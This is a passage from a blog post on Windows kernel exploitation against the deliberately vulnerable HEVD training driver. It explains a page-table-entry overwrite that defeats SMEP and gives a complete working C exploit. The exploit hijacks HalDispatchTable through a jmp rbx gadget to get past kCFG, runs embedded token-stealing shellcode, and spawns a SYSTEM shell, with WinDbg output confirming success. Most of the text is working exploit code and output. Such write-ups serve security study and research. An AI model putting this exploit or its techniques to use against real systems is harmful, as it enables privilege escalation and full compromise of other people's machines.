The Valid bit tells us whether the page is present. If this bit is not set, the PTE is not usable and the calculation is probably wrong. The Write bit tells us whether the page is writable. This is useful for debugging, but not the main SMEP bypass bit. The User/Supervisor bit is the SMEP-relevant bit. If this bit is set, the page is a user page. We want to clear it. The NX bit means No Execute. If NX is set, the CPU will refuse to execute this page even if SMEP is bypassed. Since the shellcode was allocated with PAGE_EXECUTE_READWRITE, NX should already be clear. The code checks it anyway because if NX is set, clearing the User/Supervisor bit would not be enough. We would fix SMEP, but still hit a no-execute fault.

The actual PTE overwrite is tiny:

  
QWORD modifiedPte = originalPte & ~PTE_USER_SUPERVISOR_BIT;

Since PTE_USER_SUPERVISOR_BIT is 0x4, this clears bit 2.

Then the arbitrary write primitive writes the modified PTE back into kernel memory:

  
WriteQWORD(hDevice, shellcodePteAddress, modifiedPte);

After that, the code reads it back:

  
QWORD verifyPte = ReadQWORD(hDevice, shellcodePteAddress);

This is important for the blog because it gives us before-and-after evidence:

Original PTE: U bit set
Modified PTE: U bit cleared
Verified PTE: U bit still cleared

This proves the arbitrary write successfully changed the page-table permissions.

SMEP and NX are different protections. That is why the code checks for the NX bit:

  
if (originalPte & PTE_NX_BIT)
{
    printf("[-] PTE NX bit is set. Your shellcode page is non-executable.\n");
    return FALSE;
}

In this exploit, NX should not be set because the shellcode is allocated as PAGE_EXECUTE_READWRITE. But the check is still useful because it tells us whether a future crash is caused by SMEP or by page execution permissions.

The final exploit order becomes:

Open a handle to HEVD.
Resolve the ntoskrnl.exe base.
Calculate HalDispatchTable+0x8.
Allocate user-mode shellcode with PAGE_EXECUTE_READWRITE.
Resolve the PTE base from MiGetPteAddress+0x13.
Calculate the shellcode page’s PTE.
Read the original PTE.
Clear the User/Supervisor bit.
Verify the PTE overwrite.
Overwrite HalDispatchTable+0x8 with the kCFG-safe jmp rbx gadget.
Trigger NtQueryIntervalProfile.
The HAL callback reaches the kernel gadget.
The gadget executes jmp rbx.
RBX points to the shellcode.
SMEP no longer blocks execution because the page now looks like supervisor memory.
Shellcode steals the SYSTEM token.
Restore HalDispatchTable+0x8.
Restore the original shellcode PTE.
Spawn cmd.exe.

Once this code is complete, it looks like this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <string.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL
#define HAL_ENTRY_OFFSET 0x8ULL
#define ProfileTotalIssues 2

#define IMAGE_SCN_MEM_EXECUTE 0x20000000
#define JMP_RBX_BYTE_1 0xFF
#define JMP_RBX_BYTE_2 0xE3

#define MIGETPTEADDRESS_PTEBASE_RVA 0x00298793ULL
#define MMPTEBASE_RVA               0x00CFB358ULL

#define PTE_VALID_BIT               0x1ULL
#define PTE_WRITE_BIT               0x2ULL
#define PTE_USER_SUPERVISOR_BIT     0x4ULL
#define PTE_NX_BIT                  0x8000000000000000ULL

typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
    );

typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return ok;
}

BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

QWORD GetKernelBaseAddress(LPCWSTR driverName)
{
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[-] EnumDeviceDrivers failed. Error=%lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH] = { 0 };

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    return 0;
}

QWORD GetPteAddress(QWORD virtualAddress, QWORD pteBase)
{
    return pteBase + ((virtualAddress >> 9) & 0x7FFFFFFFF8ULL);
}

BOOL IsCanonicalKernelAddress(QWORD address)
{
    return (address >= 0xFFFF000000000000ULL);
}

void PrintPteBits(const char* label, QWORD pteValue)
{
    printf("[+] %s: P=%llu W=%llu U=%llu NX=%llu Raw=0x%llx\n",
        label,
        (pteValue & PTE_VALID_BIT) ? 1ULL : 0ULL,
        (pteValue & PTE_WRITE_BIT) ? 1ULL : 0ULL,
        (pteValue & PTE_USER_SUPERVISOR_BIT) ? 1ULL : 0ULL,
        (pteValue & PTE_NX_BIT) ? 1ULL : 0ULL,
        pteValue
    );
}

QWORD ResolvePteBase(HANDLE hDevice, QWORD ntBase)
{
    QWORD miGetPteImmediateAddress = ntBase + MIGETPTEADDRESS_PTEBASE_RVA;
    QWORD mmPteBaseVariableAddress = ntBase + MMPTEBASE_RVA;

    QWORD pteBaseFromMiGet = ReadQWORD(hDevice, miGetPteImmediateAddress);
    QWORD pteBaseFromMmPteBase = ReadQWORD(hDevice, mmPteBaseVariableAddress);

    printf("[+] MiGetPteAddress+0x13 VA: 0x%llx\n", miGetPteImmediateAddress);
    printf("[+] MmPteBase variable VA:   0x%llx\n", mmPteBaseVariableAddress);
    printf("[+] PTE base from MiGet:     0x%llx\n", pteBaseFromMiGet);
    printf("[+] PTE base from MmPteBase: 0x%llx\n", pteBaseFromMmPteBase);

    if (IsCanonicalKernelAddress(pteBaseFromMiGet))
    {
        if (pteBaseFromMmPteBase && pteBaseFromMiGet != pteBaseFromMmPteBase)
        {
            printf("[!] PTE base sources differ. Using MiGetPteAddress value.\n");
        }

        return pteBaseFromMiGet;
    }

    if (IsCanonicalKernelAddress(pteBaseFromMmPteBase))
    {
        printf("[!] MiGetPteAddress value looked invalid. Using MmPteBase variable value.\n");
        return pteBaseFromMmPteBase;
    }

    printf("[-] Failed to resolve a valid PTE base\n");
    return 0;
}

BOOL MakePageSupervisor(
    HANDLE hDevice,
    QWORD targetVa,
    QWORD pteBase,
    QWORD* outPteAddress,
    QWORD* outOriginalPte
)
{
    QWORD pteAddress = GetPteAddress(targetVa, pteBase);
    QWORD originalPte = ReadQWORD(hDevice, pteAddress);
    QWORD modifiedPte = 0;
    QWORD verifyPte = 0;

    printf("[+] Target VA:               0x%llx\n", targetVa);
    printf("[+] Target PTE address:      0x%llx\n", pteAddress);
    PrintPteBits("Original PTE", originalPte);

    if (!(originalPte & PTE_VALID_BIT))
    {
        printf("[-] Shellcode PTE is not present/valid. PTE calculation is probably wrong.\n");
        return FALSE;
    }

    if (!(originalPte & PTE_USER_SUPERVISOR_BIT))
    {
        printf("[!] Shellcode PTE is already supervisor. SMEP should not block this page.\n");
    }

    if (originalPte & PTE_NX_BIT)
    {
        printf("[-] Shellcode PTE has NX set. CPU cannot execute this page even after clearing U/S.\n");
        return FALSE;
    }

    modifiedPte = originalPte & ~PTE_USER_SUPERVISOR_BIT;

    PrintPteBits("Modified PTE", modifiedPte);

    if (!WriteQWORD(hDevice, pteAddress, modifiedPte))
    {
        printf("[-] Failed to write modified shellcode PTE\n");
        return FALSE;
    }

    verifyPte = ReadQWORD(hDevice, pteAddress);
    PrintPteBits("Verified PTE", verifyPte);

    if (verifyPte & PTE_USER_SUPERVISOR_BIT)
    {
        printf("[-] Verified PTE still has U/S bit set. SMEP will still block execution.\n");
        return FALSE;
    }

    if (verifyPte & PTE_NX_BIT)
    {
        printf("[-] Verified PTE has NX set. Execution will still fail.\n");
        return FALSE;
    }

    if (outPteAddress)
    {
        *outPteAddress = pteAddress;
    }

    if (outOriginalPte)
    {
        *outOriginalPte = originalPte;
    }

    printf("[+] Shellcode page is now supervisor from the paging perspective.\n");
    return TRUE;
}

unsigned char shellcode[] = {
    0x9c, 0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41,
    0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41,
    0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x65,
    0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48,
    0x89, 0xc3, 0x49, 0x89, 0xc4, 0x4d, 0x8b, 0xa4,
    0x24, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xec,
    0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0xac, 0x24,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xfd, 0x04,
    0x75, 0xe3, 0x4d, 0x8b, 0xac, 0x24, 0xb8, 0x04,
    0x00, 0x00, 0x49, 0x83, 0xe5, 0xf0, 0x4c, 0x8b,
    0xb3, 0xb8, 0x04, 0x00, 0x00, 0x49, 0x83, 0xe6,
    0x0f, 0x4d, 0x09, 0xf5, 0x4c, 0x89, 0xab, 0xb8,
    0x04, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
    0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41,
    0x59, 0x41, 0x58, 0x5d, 0x5f, 0x5e, 0x5a, 0x59,
    0x5b, 0x9d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3
};

int main()
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    LPVOID shellcodeAddress = NULL;

    QWORD ntBase = 0;
    QWORD halDispatchTable = 0;
    QWORD halDispatchEntry = 0;
    QWORD originalHalEntry = 0;
    QWORD verifyHalEntry = 0;
    QWORD restoredHalEntry = 0;
    QWORD jmpRbxGadget = 0;
    QWORD pteBase = 0;
    QWORD shellcodePteAddress = 0;
    QWORD originalShellcodePte = 0;
    QWORD restoredShellcodePte = 0;

    HMODULE ntdll = NULL;
    NtQueryIntervalProfile_t NtQueryIntervalProfile = NULL;

	BYTE b1 = 0, b2 = 0;

    ULONG interval = 0;
    NTSTATUS status = 0;

    BOOL halOverwritten = FALSE;
    BOOL pteOverwritten = FALSE;

    printf("[+] Opening device: %ls\n", DEVICE_NAME);

    hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    ntBase = GetKernelBaseAddress(L"ntoskrnl.exe");

    if (!ntBase)
    {
        ntBase = GetKernelBaseAddress(L"ntkrnlmp.exe");
    }

    if (!ntBase)
    {
        printf("[-] Failed to find ntoskrnl.exe / ntkrnlmp.exe base\n");
        goto cleanup;
    }

    printf("[+] nt base:                 0x%llx\n", ntBase);

	halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    halDispatchEntry = halDispatchTable + HAL_ENTRY_OFFSET;

    printf("[+] HalDispatchTable:        0x%llx\n", halDispatchTable);
    printf("[+] HalDispatchTable + 0x8:  0x%llx\n", halDispatchEntry);

    shellcodeAddress = VirtualAlloc(
        NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!shellcodeAddress)
    {
        printf("[-] VirtualAlloc failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    memcpy(shellcodeAddress, shellcode, sizeof(shellcode));

    printf("[+] Shellcode address:       0x%p\n", shellcodeAddress);

    printf("[+] Resolving PTE base...\n");

    pteBase = ResolvePteBase(hDevice, ntBase);

    if (!pteBase)
    {
        printf("[-] Failed to resolve PTE base\n");
        goto cleanup;
    }

    printf("[+] Making shellcode page supervisor...\n");

    if (!MakePageSupervisor(
        hDevice,
        (QWORD)shellcodeAddress,
        pteBase,
        &shellcodePteAddress,
        &originalShellcodePte
    ))
    {
        printf("[-] Failed to modify shellcode PTE\n");
        goto cleanup;
    }

    pteOverwritten = TRUE;

    ntdll = GetModuleHandleA("ntdll.dll");

    if (!ntdll)
    {
        printf("[-] GetModuleHandleA(ntdll.dll) failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    NtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(
            ntdll,
            "NtQueryIntervalProfile"
        );

    if (!NtQueryIntervalProfile)
    {
        printf("[-] Failed to resolve NtQueryIntervalProfile. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    originalHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    if (!originalHalEntry)
    {
        printf("[-] Failed to read original HalDispatchTable entry\n");
        goto cleanup;
    }

    printf("[+] Original HAL entry:      0x%llx\n", originalHalEntry);

    printf("[+] Overwriting HalDispatchTable + 0x8...\n");

    jmpRbxGadget = ntBase + 0x044584a;

    printf("[+] JMP RBX gadget:          0x%llx\n", jmpRbxGadget);

    b1 = ReadBYTE(hDevice, jmpRbxGadget);
    b2 = ReadBYTE(hDevice, jmpRbxGadget + 1);

    printf("[+] Gadget VA:               0x%llx\n", jmpRbxGadget);
    printf("[+] Gadget RVA:              0x%llx\n", jmpRbxGadget - ntBase);
    printf("[+] Gadget bytes:            %02x %02x\n", b1, b2);

    if (b1 != 0xFF || b2 != 0xE3)
    {
        printf("[-] Not a live jmp rbx gadget. Aborting.\n");
        goto cleanup;
    }

    if (!WriteQWORD(
        hDevice,
        halDispatchEntry,
        jmpRbxGadget
    ))
    {
        printf("[-] Failed to overwrite HalDispatchTable entry\n");
        goto cleanup;
    }

    halOverwritten = TRUE;

    verifyHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after write:   0x%llx\n", verifyHalEntry);

    if (verifyHalEntry != jmpRbxGadget)
    {
        printf("[-] HAL entry verification failed\n");
        goto cleanup;
    }

    printf("[+] Triggering NtQueryIntervalProfile...\n");

    printf("[+] About to trigger NtQueryIntervalProfile...\n");
    //__debugbreak();

    status = NtQueryIntervalProfile(
        ProfileTotalIssues,
        (PULONG)shellcodeAddress
    );

    printf("[+] NtQueryIntervalProfile returned: 0x%lx\n", status);

    printf("[+] Restoring original HAL entry...\n");

    if (!WriteQWORD(hDevice, halDispatchEntry, originalHalEntry))
    {
        printf("[-] Failed to restore original HAL entry\n");
        goto cleanup;
    }

    halOverwritten = FALSE;

    restoredHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after restore: 0x%llx\n", restoredHalEntry);

    if (restoredHalEntry == originalHalEntry)
    {
        printf("[+] HAL entry restored successfully\n");
    }
    else
    {
        printf("[!] HAL entry restore verification mismatch\n");
    }

    printf("[+] Spawning cmd.exe\n");
    system("cmd.exe");

cleanup:

    if (halOverwritten && originalHalEntry)
    {
        printf("[!] Attempting emergency HAL entry restore...\n");
        WriteQWORD(hDevice, halDispatchEntry, originalHalEntry);
    }

    if (pteOverwritten && shellcodePteAddress && originalShellcodePte)
    {
        printf("[!] Restoring original shellcode PTE...\n");

        if (WriteQWORD(hDevice, shellcodePteAddress, originalShellcodePte))
        {
            restoredShellcodePte = ReadQWORD(hDevice, shellcodePteAddress);
            PrintPteBits("Restored shellcode PTE", restoredShellcodePte);
        }
        else
        {
            printf("[!] Failed to restore original shellcode PTE\n");
        }

        pteOverwritten = FALSE;
    }

    if (shellcodeAddress)
    {
        VirtualFree(shellcodeAddress, 0, MEM_RELEASE);
    }

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
    }

    return 0;
}

Running this works and we have successfully received a SYSTEM shell bypassing kCFG and SMEP. On our hardware breakpoint it becomes much clearer that we have shifted from U in PTE table to a K.

0: kd> r
rax=fffff8026284584a rbx=000001ab4f1c0000 rcx=0000000000000001
rdx=0000000000000018 rsi=00000000000000a4 rdi=0000000000000001
rip=fffff8026284584a rsp=ffffb305a824ca68 rbp=ffffb305a824cb80
 r8=ffffb305a824caa0  r9=ffffb305a824cad0 r10=0000fffff8026284
r11=ffffa3fd82e00000 r12=fffff80262d8f9d0 r13=fffff8026284584a
r14=fffff80263000a68 r15=000001ab4f1c0000
iopl=0         nv up ei pl nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040217
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`6284584a ffe3            jmp     rbx {000001ab`4f1c0000}
0: kd> !pte 000001ab4f1c0000
                                           VA 000001ab4f1c0000
PXE at FFFFA954AA552018    PPE at FFFFA954AA403568    PDE at FFFFA954806AD3C0    PTE at FFFFA900D5A78E00
contains 0A00000038D9C867  contains 0A00000038D9D867  contains 0A00000038D9E867  contains 0000000038E1E863
pfn 38d9c     ---DA--UWEV  pfn 38d9d     ---DA--UWEV  pfn 38d9e     ---DA--UWEV  pfn 38e1e     ---DA--**K**WEV

This started as a simple write-what-where bug, but it turned into a full tour of modern Windows kernel exploitation pain. First, the primitive gave us clean kernel read/write. Then it gave us a no-shellcode token overwrite. Then we tried the classic HalDispatchTable route, watched KCFG slap it out of the air, redirected the call through a kernel gadget, watched SMEP complain next, and finally edited the shellcode page’s PTE so the CPU would treat it as supervisor memory. The important lesson is that modern kernel exploitation is rarely about one magic bug. It is about turning one primitive into the next primitive until Windows runs out of reasons to say no.

References

  
https://connormcgarr.github.io/pte-overwrites/
https://connormcgarr.github.io/Kernel-Exploitation-2/
https://connormcgarr.github.io/paging/
https://areyou1or0.it/index.php/2022/08/13/hevd-windows-kernel-exploitation-2-write-what-where/
https://xavibel.com/2025/07/01/hevd-write-what-where-windows-10-pro-smep-kcfg-kaslr-protections/
https://fuzzysecurity.com/tutorials/expDev/15.html
https://insideyourkernel.com/2025-02-01-windows-10-x64-kernel-exploitation-arbitrary-write-write-what-where-using-hevd.html
https://github.com/ommadawn46/HEVD-Exploit-Win10-22H2-KVAS
https://ommadawn46.medium.com/windows-kernel-exploitation-hevd-on-windows-10-22h2-b407c6f5b8f7

Red Team Vulnerable Drivers

This post is licensed under CC BY 4.0 by the author.